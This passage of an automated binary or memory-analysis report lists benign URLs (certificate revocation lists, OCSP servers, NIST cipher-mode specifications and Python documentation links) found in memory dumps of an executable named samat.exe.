Source: samat.exe, 00000008.00000003.4501044998.000001BCCC465000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC818000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503522230.000001BCCC829000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4498534466.000001BCCC431000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503045992.000001BCCC818000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508302537.000001BCCC49D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500627948.000001BCCC818000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508607336.000001BCCC82A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502404142.000001BCCC466000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025779747.000001BCCC818000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3022845208.000001BCCC81D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: samat.exe, 00000008.00000003.4500627948.000001BCCC7F0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3022667291.000001BCCC895000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3022845208.000001BCCC7EF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4559133719.000001BCCC7F1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3022667291.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/577916/
Source: samat.exe, 00000008.00000003.4518409392.000001BCCD348000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524395230.000001BCCD342000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4521907829.000001BCCD34D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562686604.000001BCCD347000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529360624.000001BCCD347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: samat.exe, 00000008.00000002.4559686522.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4551934571.000001BCCA50A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: samat.exe, 00000008.00000002.4561597900.000001BCCCAEC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522921844.000001BCCC8C1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503744422.000001BCCC8A7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4510392887.000001BCCC8BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8A9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4537138300.000001BCCC8C6000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
Source: samat.exe, 00000008.00000003.4518409392.000001BCCD348000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524395230.000001BCCD342000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4521907829.000001BCCD34D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562686604.000001BCCD347000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529360624.000001BCCD347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
Source: samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl
Source: samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527305134.000001BCCC8A3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crlW
Source: samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527305134.000001BCCC8A3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crlO
Source: samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: samat.exe, 00000008.00000002.4559686522.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4520729290.000001BCCCAD5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC834000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4561540067.000001BCCCAD7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529948916.000001BCCC84F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529095803.000001BCCC843000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/eax/eax-spec.pdf
Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf
Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531671427.000001BCCC990000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527808216.000001BCCC98D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4530017261.000001BCCD41D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514102538.000001BCCC983000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517233682.000001BCCC984000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529696285.000001BCCC990000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
Source: samat.exe, 00000008.00000003.4532754927.000001BCCC9FD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513874113.000001BCCC714000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4518791762.000001BCCC718000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4565419860.000001BCCDB6C000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4558325205.000001BCCC719000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4565219957.000001BCCDA30000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4565419860.000001BCCDB60000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4509940106.000001BCCC711000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
Source: samat.exe, 00000008.00000002.4565219957.000001BCCDA30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
Source: samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://docs.python.org/library/itertools.html#recipes
Source: samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://foo/bar.tar.gz
Source: samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://foo/bar.tgz
Source: samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC834000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4559388808.000001BCCC857000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529948916.000001BCCC84F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529095803.000001BCCC843000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527808216.000001BCCC98D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514102538.000001BCCC983000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517233682.000001BCCC984000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
Source: samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC834000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514102538.000001BCCC983000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517233682.000001BCCC984000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.es
Source: samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.es0
Source: samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.esS
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 